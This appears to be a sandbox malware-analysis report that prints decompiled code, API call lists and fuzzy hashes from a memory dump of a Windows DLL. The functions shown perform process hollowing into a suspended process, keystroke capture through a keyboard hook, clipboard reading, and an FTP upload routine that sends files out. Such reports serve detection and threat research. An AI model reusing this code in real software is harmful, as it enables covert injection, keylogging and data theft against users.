0x1000bcf5
0x1000bcf8
0x1000bcfb
0x00000000
0x1000bcfb
0x1000bd46
0x1000bd47
0x1000bd47
0x1000bd47
0x1000bd48
0x1000bd48
0x1000bd48
0x1000bd4e
0x1000bd4e
0x1000bd40
0x1000bd20
0x00000000

APIs

CreateProcessW.KERNEL32 ref: 1000BE3A
Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE4C
GetThreadContext.KERNEL32(?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE5F
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 1000BE7F
NtUnmapViewOfSection.NTDLL(?,?), ref: 1000BE8F
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000), ref: 1000BEB0
WriteProcessMemory.KERNEL32(?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?,?,?,00000004,00000000,?), ref: 1000BECF
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 1000BF46
VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?,?,?), ref: 1000BF69
WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?), ref: 1000BF91
SetThreadContext.KERNEL32(?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000), ref: 1000BFBE
ResumeThread.KERNEL32(?,?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?), ref: 1000BFD0

Strings

D, xrefs: 1000BDD6

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$Memory$ThreadWrite$ContextVirtual$AllocCreateProtectReadResumeSectionSleepUnmapView
String ID: D
API String ID: 251557703-2746444292
Opcode ID: ddef249305afe7fb47cb9d0f556ca1214483f34f73db6a87cab3b00bcfcfae37
Instruction ID: 51d3043d039fb927f3967ecafbc59ab6c1ff4cf1235e2731e9b23ce8e7e6b630
Opcode Fuzzy Hash: ddef249305afe7fb47cb9d0f556ca1214483f34f73db6a87cab3b00bcfcfae37
Instruction Fuzzy Hash: A8916FB5904259AFEB51DBA4CC81FEEB7BCEB49340F1140E6F208E7156DA34AE458B20

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD60, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 208
injectionthreadsleepCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E1000BD60(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				void _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v88;
				long _v252;
				long _v256;
				void* _v284;
				intOrPtr _v296;
				signed short _v330;
				void* _v336;
				intOrPtr _v356;
				long _v360;
				intOrPtr _v364;
				long _v368;
				void* _v376;
				struct _PROCESS_INFORMATION _v392;
				struct _CONTEXT _v664;
				void* _t152;
				void* _t155;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				void* _t182;
				void* _t184;
				void* _t185;
				void* _t187;
				void* _t189;
				intOrPtr _t190;
				void* _t191;

				_t187 = _t189;
				_t190 = _t189 + 0xfffffd6c;
				_v12 = __edx;
				_v8 = __eax;
				E100045F4(_v8);
				E10003C28( &_v12);
				_push(_t187);
				_push(0x1000c027);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				_push(_t187);
				_push(0x1000bfdf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E100026E0( &(_v664.ExtendedRegisters), 0x44);
				_t191 = _t187;
				E100026E0( &_v392, 0x10);
				E100026E0( &_v664, 0xcc);
				_v664.ExtendedRegisters.cb = 0x44;
				_v664.ContextFlags = 0x10007;
				_t184 = _v8;
				E1000BD50();
				E1000BD50();
				if(CreateProcessW(0, E1000390C(_v12), 0, 0, 0, 4, 0, 0,  &(_v664.ExtendedRegisters),  &_v392) != 0) {
					Sleep(0xc8);
					GetThreadContext(_v392.hThread,  &_v664);
					ReadProcessMemory(_v392.hProcess, _v664.Ebx + 8,  &_v24, 4,  &_v20);
					NtUnmapViewOfSection(_v392.hProcess,  &_v24);
					_v16 = VirtualAllocEx(_v392.hProcess, _v284, _v256, 0x3000, 4);
					WriteProcessMemory(_v392.hProcess, _v16, _t184, _v252,  &_v20);
					_t182 = _v28 + 0xf8;
					_t152 = (_v330 & 0x0000ffff) - 1;
					if(_t152 >= 0) {
						_t155 = _t152 + 1;
						_t185 = 0;
						do {
							_push(0);
							_push(_t182);
							asm("cdq");
							asm("adc edx, [esp+0x4]");
							_t191 = _t191 + 8;
							E1000BD50();
							WriteProcessMemory(_v392.hProcess, _v16 + _v364, _v8 + _v356, _v360,  &_v20);
							VirtualProtectEx(_v392.hProcess, _v16 + _v364, _v368, 0x40,  &_v24);
							_t185 = _t185 + 1;
							_t155 = _t155 - 1;
						} while (_t155 != 0);
					}
					WriteProcessMemory(_v392, _v664.Ebx + 8,  &_v16, 4,  &_v20);
					asm("sbb ebx, ebx");
					_v664.Eax = _v16 + _v296;
					if(_t152 + 1 == 1) {
						SetThreadContext(_v392.hThread,  &_v664);
						asm("sbb ebx, ebx");
						ResumeThread(_v392.hThread);
					}
				}
				_pop(_t173);
				 *[fs:eax] = _t173;
				_pop(_t174);
				 *[fs:eax] = _t174;
				_push(E1000C02E);
				E10003770( &_v12);
				_t175 =  *E1000BD14; // 0x1000bd18
				return E10004590( &_v8, _t175);
			}

0x1000bd61
0x1000bd63
0x1000bd6c
0x1000bd6f
0x1000bd75
0x1000bd7d
0x1000bd84
0x1000bd85
0x1000bd8a
0x1000bd8d
0x1000bd94
0x1000bd95
0x1000bd9a
0x1000bd9d
0x1000bdad
0x1000bdb9
0x1000bdbf
0x1000bdd1
0x1000bdd6
0x1000bde0
0x1000bdea
0x1000bdf7
0x1000be10
0x1000be41
0x1000be4c
0x1000be5f
0x1000be7f
0x1000be8f
0x1000beb5
0x1000becf
0x1000bed7
0x1000bee4
0x1000bee7
0x1000beed
0x1000beee
0x1000bef0
0x1000bef4
0x1000bef5
0x1000befe
0x1000bf02
0x1000bf06
0x1000bf19
0x1000bf46
0x1000bf69
0x1000bf6e
0x1000bf6f
0x1000bf6f
0x1000bef0
0x1000bf91
0x1000bf99
0x1000bfa5
0x1000bfae
0x1000bfbe
0x1000bfc6
0x1000bfd0
0x1000bfd0
0x1000bfae
0x1000bfd7
0x1000bfda
0x1000c005
0x1000c008
0x1000c00b
0x1000c013
0x1000c01b
0x1000c026

APIs

Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36

CreateProcessW.KERNEL32 ref: 1000BE3A
Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE4C
GetThreadContext.KERNEL32(?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 1000BE5F
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 1000BE7F
NtUnmapViewOfSection.NTDLL(?,?), ref: 1000BE8F
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,00000000,?,00010007,000000C8,00000000,00000000,00000000), ref: 1000BEB0
WriteProcessMemory.KERNEL32(?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?,?,?,00000004,00000000,?), ref: 1000BECF
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 1000BF46
VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?,?,?), ref: 1000BF69
WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000,00000004,?), ref: 1000BF91
SetThreadContext.KERNEL32(?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?,00003000), ref: 1000BFBE
ResumeThread.KERNEL32(?,?,00010007,?,?,00000000,00000004,00000000,?,00000000,1000C797,?,00000000,?,?,?), ref: 1000BFD0

Strings

D, xrefs: 1000BDD6

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtual$CreateProtectReadResumeSectionSleepStringUnmapView
String ID: D
API String ID: 3069046386-2746444292
Opcode ID: 5631d4e2f2f3d5cc413d0a5eaa7ab72704478a6d10640b3fbfc5c98150998316
Instruction ID: 773f2633af5c966dbae7503bb26a44348cd9fcb95ad73bfc51fdb85d8e92df93
Opcode Fuzzy Hash: 5631d4e2f2f3d5cc413d0a5eaa7ab72704478a6d10640b3fbfc5c98150998316
Instruction Fuzzy Hash: A971DAB5A00119AFEB60DB98CD81FEEB3FCEB48340F5144A5F608E7245DA74AE458F64

Uniqueness

Uniqueness Score: -1.00%

Function 10004B4D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004B4D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x1000f5a8)) =  *((intOrPtr*)(__eax - 0x1000f5a8)) + __eax - 0x1000f5a8;
				 *0x1000e008 = 2;
				 *0x1000f010 = 0x10001098;
				 *0x1000f014 = 0x100010a0;
				 *0x1000f03a = 2;
				 *0x1000f000 = E10003FA8;
				if(E100027DC() != 0) {
					_t3 = E1000280C();
				}
				E100028D0(_t3);
				 *0x1000f040 = 0xd7b0;
				 *0x1000f20c = 0xd7b0;
				 *0x1000f3d8 = 0xd7b0;
				 *0x1000f030 = GetCommandLineA();
				 *0x1000f02c = E10001150();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x1000f5ac = E10004A84(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x1000f5ac = E10004A84(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x1000f5ac = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x1000f024 = _t11;
				return _t11;
			}

0x10004b4d
0x10004b52
0x10004b57
0x10004b59
0x10004b60
0x10004b6a
0x10004b74
0x10004b7b
0x10004b8c
0x10004b8e
0x10004b8e
0x10004b93
0x10004b98
0x10004ba1
0x10004baa
0x10004bb8
0x10004bc2
0x10004bd6
0x10004c0f
0x10004bd8
0x10004be6
0x10004bfe
0x10004be8
0x10004be8
0x10004be8
0x10004be6
0x10004c14
0x10004c19
0x10004c1e

APIs

Part of subcall function 100027DC: GetKeyboardType.USER32 ref: 100027E1
Part of subcall function 100027DC: GetKeyboardType.USER32 ref: 100027ED

GetCommandLineA.KERNEL32 ref: 10004BB3
GetVersion.KERNEL32 ref: 10004BC7
GetVersion.KERNEL32 ref: 10004BD8
GetCurrentThreadId.KERNEL32 ref: 10004C14

Part of subcall function 1000280C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 1000282E
Part of subcall function 1000280C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002861
Part of subcall function 1000280C: RegCloseKey.ADVAPI32(?,10002884,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002877

GetThreadLocale.KERNEL32 ref: 10004BF4

Part of subcall function 10004A84: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,10004AEA), ref: 10004AAA

Strings

p3v, xrefs: 10004BB8

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID: p3v
API String ID: 3734044017-3871146107
Opcode ID: 4b223a8082610888e86e6a9728138b880df6553b396fe473043678283972453b
Instruction ID: b691414424a171523e6ed701ccaa2f926f8cba09af9fdddc6886d40973360df8
Opcode Fuzzy Hash: 4b223a8082610888e86e6a9728138b880df6553b396fe473043678283972453b
Instruction Fuzzy Hash: 600156F88013918AF750EFB08C863A93B60EB113C0F01852DD2404AA6FDFB95184EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 10006D04, Relevance: 12.0, APIs: 8, Instructions: 44
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006D04() {
				void* _t10;

				_t10 = 1;
				if(GetKeyState(0x14) != 1 || GetKeyState(0x10) >= 0) {
					if(GetKeyState(0x14) != 1 || GetKeyState(0x10) < 0) {
						if(GetKeyState(0x14) == 1 || GetKeyState(0x10) >= 0) {
							if(GetKeyState(0x14) != 1 && GetKeyState(0x10) >= 0) {
								_t10 = 1;
							}
						} else {
							_t10 = 0;
						}
					} else {
						_t10 = 0;
					}
				} else {
					_t10 = 1;
				}
				return _t10;
			}

0x10006d05
0x10006d12
0x10006d2f
0x10006d4c
0x10006d69
0x10006d77
0x10006d77
0x10006d5a
0x10006d5a
0x10006d5a
0x10006d3d
0x10006d3d
0x10006d3d
0x10006d20
0x10006d20
0x10006d20
0x10006d7c

APIs

GetKeyState.USER32(00000014), ref: 10006D09
GetKeyState.USER32(00000010), ref: 10006D16
GetKeyState.USER32(00000014), ref: 10006D26
GetKeyState.USER32(00000010), ref: 10006D33
GetKeyState.USER32(00000014), ref: 10006D43
GetKeyState.USER32(00000010), ref: 10006D50

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 6918d53d3d07aab4c0cd6e783a8e12689080c07576cae801b53ea161e8d972bc
Instruction ID: d6486f2fec8aba8f3b5500d340924e9af812674e08ffb561a2d1824f8f856f0b
Opcode Fuzzy Hash: 6918d53d3d07aab4c0cd6e783a8e12689080c07576cae801b53ea161e8d972bc
Instruction Fuzzy Hash: 6EF01D2CF95A4728FD90E2A04D527DD1152CF187C6FA0802AEA802D09E98825AC630FB

Uniqueness

Uniqueness Score: -1.00%

Function 10008040, Relevance: 10.6, APIs: 7, Instructions: 71
memorythreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E10008040(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v20;
				char _v24;
				struct HKL__* _v28;
				char _v284;
				intOrPtr _v288;
				char _v292;
				struct HHOOK__* _t20;
				int _t32;
				intOrPtr _t33;
				long _t38;
				void* _t48;

				_push(_t48);
				_push(0x10008123);
				_push( *[fs:edx]);
				 *[fs:edx] = _t48 + 0xfffffee0;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 == 0 && (_a8 == 0x104 || _a8 == 0x100)) {
					GetKeyboardState( &_v284);
					_v28 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), 0));
					_v292 = _v24;
					_v288 = _v20;
					_t38 = VirtualAlloc(0, 0x10c, 0x1000, 0x40);
					E100050D0(_t38,  &_v292);
					_t32 =  *0x1000f68c; // 0xc1b9
					_t33 =  *0x1000f688; // 0x0
					SendMessageA(E1000662C(_t33), _t32, 0x10c, _t38);
				}
				_pop( *[fs:0x0]);
				_push(E1000812A);
				_t20 =  *0x1000f6d4; // 0x0
				return CallNextHookEx(_t20, _a4, _a8, _a12);
			}

0x1000804e
0x1000804f
0x10008054
0x10008057
0x10008062
0x10008063
0x10008064
0x10008065
0x10008066
0x1000806b
0x1000808a
0x100080a4
0x100080aa
0x100080b3
0x100080cc
0x100080db
0x100080e6
0x100080ec
0x100080f7
0x100080f7
0x100080fc
0x10008106
0x10008117
0x10008122

APIs

GetKeyboardState.USER32(?,00000000,10008123), ref: 1000808A
GetForegroundWindow.USER32(?,00000000,10008123), ref: 1000808F
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 10008097
GetKeyboardLayout.USER32 ref: 1000809F
VirtualAlloc.KERNEL32(00000000,0000010C,00001000,00000040,00000000,?,00000000,10008123), ref: 100080C7
SendMessageA.USER32(00000000,0000C1B9,0000010C,00000000), ref: 100080F7
CallNextHookEx.USER32(00000000,?,?,?), ref: 1000811D

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: KeyboardWindow$AllocCallForegroundHookLayoutMessageNextProcessSendStateThreadVirtual
String ID:
API String ID: 2475829859-0
Opcode ID: cfb8c2f6c07dd6c8c12c5b73d6607ef2dbe25eb77fb659a241c05aedeeedaf23
Instruction ID: 27a6fad57be863aabbe855ec58336ce39a4f816ab1f20d22dae40b31cdfd5c32
Opcode Fuzzy Hash: cfb8c2f6c07dd6c8c12c5b73d6607ef2dbe25eb77fb659a241c05aedeeedaf23
Instruction Fuzzy Hash: 412151B4600208AFFB51DF64CC82FDB37A8EB4C781F004524FA44A7255DA75AE858FA4

Uniqueness

Uniqueness Score: -1.00%

Function 100068EC, Relevance: 10.6, APIs: 7, Instructions: 62
networkfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100068EC(WCHAR* __eax, WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				WCHAR* _v8;
				WCHAR* _v12;
				int _t14;
				WCHAR* _t25;
				void* _t33;
				void* _t36;

				_v12 = __ecx;
				_v8 = __edx;
				_t25 = __eax;
				_t36 = InternetOpenW(0, 1, 0, 0, 0);
				_t33 = InternetConnectW(_t36, _t25, 0x15, _a8, _a4, 1, 0x8000000, 0);
				_t14 = FtpSetCurrentDirectoryW(_t33, _v8);
				asm("sbb eax, eax");
				WaitForSingleObject(_t14 + 0x00000001 & 0x0000007f, 0xffffffff);
				FtpPutFileW(_t33, _v12, _a12, 2, 0);
				asm("sbb ebx, ebx");
				InternetCloseHandle(_t36);
				InternetCloseHandle(_t33);
				return  &(_t25[0]);
			}

0x100068f5
0x100068f8
0x100068fb
0x1000690c
0x10006928
0x1000692f
0x10006937
0x10006940
0x10006952
0x1000695a
0x1000695e
0x10006964
0x10006971

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 10006907
InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 10006923
FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 1000692F
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 10006940
FtpPutFileW.WININET(00000000,?,?,00000002,00000000), ref: 10006952
InternetCloseHandle.WININET(00000000), ref: 1000695E
InternetCloseHandle.WININET(00000000), ref: 10006964

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectCurrentDirectoryFileObjectOpenSingleWait
String ID:
API String ID: 140008950-0
Opcode ID: 986aac2d3270ff8f09d33a4b0a939757c489752215f58343083dd92cbf4cca8d
Instruction ID: cbc3213e50a342726adeb0dcb95658ed0f55962254ebdcc4bae47dda2437ff56
Opcode Fuzzy Hash: 986aac2d3270ff8f09d33a4b0a939757c489752215f58343083dd92cbf4cca8d
Instruction Fuzzy Hash: D80175767853047EF710DAA84C83FBE629CDB49BA5F300629F614EB1C1D5B27D004665

Uniqueness

Uniqueness Score: -1.00%

Function 100069DC, Relevance: 9.1, APIs: 6, Instructions: 98
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E100069DC(struct HWND__* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v9;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				intOrPtr* _t49;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t70;
				struct HWND__* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t77;

				_t75 = _t76;
				_t77 = _t76 + 0xffffffe8;
				_v8 = 0;
				_t49 = __edx;
				_t72 = __eax;
				_push(_t75);
				_push(0x10006b04);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_v9 = 1;
				E10003770(__edx);
				if(OpenClipboard(_t72) == 0) {
					_v9 = 0;
					__eflags = 0;
					_pop(_t62);
					 *[fs:eax] = _t62;
					_push(E10006B0B);
					_t63 =  *0x100069b4; // 0x100069b8
					return E10004590( &_v8, _t63);
				} else {
					_push(_t75);
					_push(0x10006add);
					_push( *[fs:eax]);
					 *[fs:eax] = _t77;
					_v16 = GetClipboardData(0xd);
					_t80 = _v16;
					if(_v16 == 0) {
						_v9 = 0;
						__eflags = 0;
						_pop(_t64);
						 *[fs:eax] = _t64;
						_push(E10006AE8);
						return CloseClipboard();
					} else {
						_push(_t75);
						_push(0x10006abf);
						_push( *[fs:eax]);
						 *[fs:eax] = _t77;
						_t31 = _v16;
						GlobalFix(_v16);
						_v28 = GlobalSize(_v16);
						_v24 = 0;
						_push(_v28);
						E10004584();
						E100050D0(_v8, _t31);
						E100037AC(_t49, _v8);
						E10003AB8( *_t49, E1000391C( *_t49) - 1, 1, _t80, _t49);
						_pop(_t70);
						 *[fs:eax] = _t70;
						_push(E10006ACA);
						return GlobalUnWire(_v16);
					}
				}
			}

0x100069dd
0x100069df
0x100069e6
0x100069e9
0x100069eb
0x100069ef
0x100069f0
0x100069f5
0x100069f8
0x100069fb
0x10006a01
0x10006a0e
0x10006ae4
0x10006ae8
0x10006aea
0x10006aed
0x10006af0
0x10006af8
0x10006b03
0x10006a14
0x10006a16
0x10006a17
0x10006a1c
0x10006a1f
0x10006a29
0x10006a2c
0x10006a30
0x10006ac6
0x10006aca
0x10006acc
0x10006acf
0x10006ad2
0x10006adc
0x10006a36
0x10006a38
0x10006a39
0x10006a3e
0x10006a41
0x10006a44
0x10006a48
0x10006a5a
0x10006a5d
0x10006a63
0x10006a72
0x10006a82
0x10006a8c
0x10006aa3
0x10006aaa
0x10006aad
0x10006ab0
0x10006abe
0x10006abe
0x10006a30

APIs

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

OpenClipboard.USER32(00000000), ref: 10006A07
GetClipboardData.USER32 ref: 10006A24
GlobalFix.KERNEL32(00000000), ref: 10006A48
GlobalSize.KERNEL32(00000000), ref: 10006A53

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

GlobalUnWire.KERNEL32(00000000), ref: 10006AB9
CloseClipboard.USER32 ref: 10006AD7

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipboardGlobal$String$AllocCloseDataFreeOpenSizeWire
String ID:
API String ID: 1300121464-0
Opcode ID: 064efa2ddcbdc333166debe158bc30ea9b511c389f605a726f971f8daa8baf48
Instruction ID: 6c9ee2d81449cc0851c779360ccc62e81b10a1ab3d70038b93f0ad500b4e2f45
Opcode Fuzzy Hash: 064efa2ddcbdc333166debe158bc30ea9b511c389f605a726f971f8daa8baf48
Instruction Fuzzy Hash: D3310774A04644AFFB01DBA4CC52AAFB7E9EB4D380F6284B5F900E3749DB35AD00CA55

Uniqueness

Uniqueness Score: -1.00%

Function 100051E8, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100051E8(WCHAR* __eax, void* __edx) {
				WCHAR* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t7;
				void* _t9;
				struct HRSRC__* _t13;
				void* _t14;
				void* _t19;

				_t2 = __eax;
				_t19 = __edx;
				if(__eax == 0) {
					_t2 =  *0x1000e0a8; // 0x100051d8
				}
				_t3 =  *0x1000f654; // 0x10000000
				_t13 = FindResourceW(_t3, _t2, 0xa);
				_t5 =  *0x1000f654; // 0x10000000
				SizeofResource(_t5, _t13);
				_t7 =  *0x1000f654; // 0x10000000
				_t14 = LoadResource(_t7, _t13);
				_t9 = LockResource(_t14);
				if(_t9 != 0) {
					E100050D0(_t19, _t9);
					return FreeResource(_t14);
				}
				return _t9;
			}

0x100051e8
0x100051eb
0x100051ef
0x100051f1
0x100051f1
0x100051f9
0x10005204
0x10005207
0x1000520d
0x10005215
0x10005220
0x10005223
0x1000522a
0x10005231
0x00000000
0x10005237
0x1000523f

APIs

FindResourceW.KERNEL32(10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 100051FF
SizeofResource.KERNEL32(10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 1000520D
LoadResource.KERNEL32(10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 1000521B
LockResource.KERNEL32(00000000,10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 10005223
FreeResource.KERNEL32(00000000,00000000,10000000,00000000,10000000,00000000,10000000,00000000,0000000A,1000F834,?,?,1000D1D5,00008007,00000000,1000D759), ref: 10005237

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID:
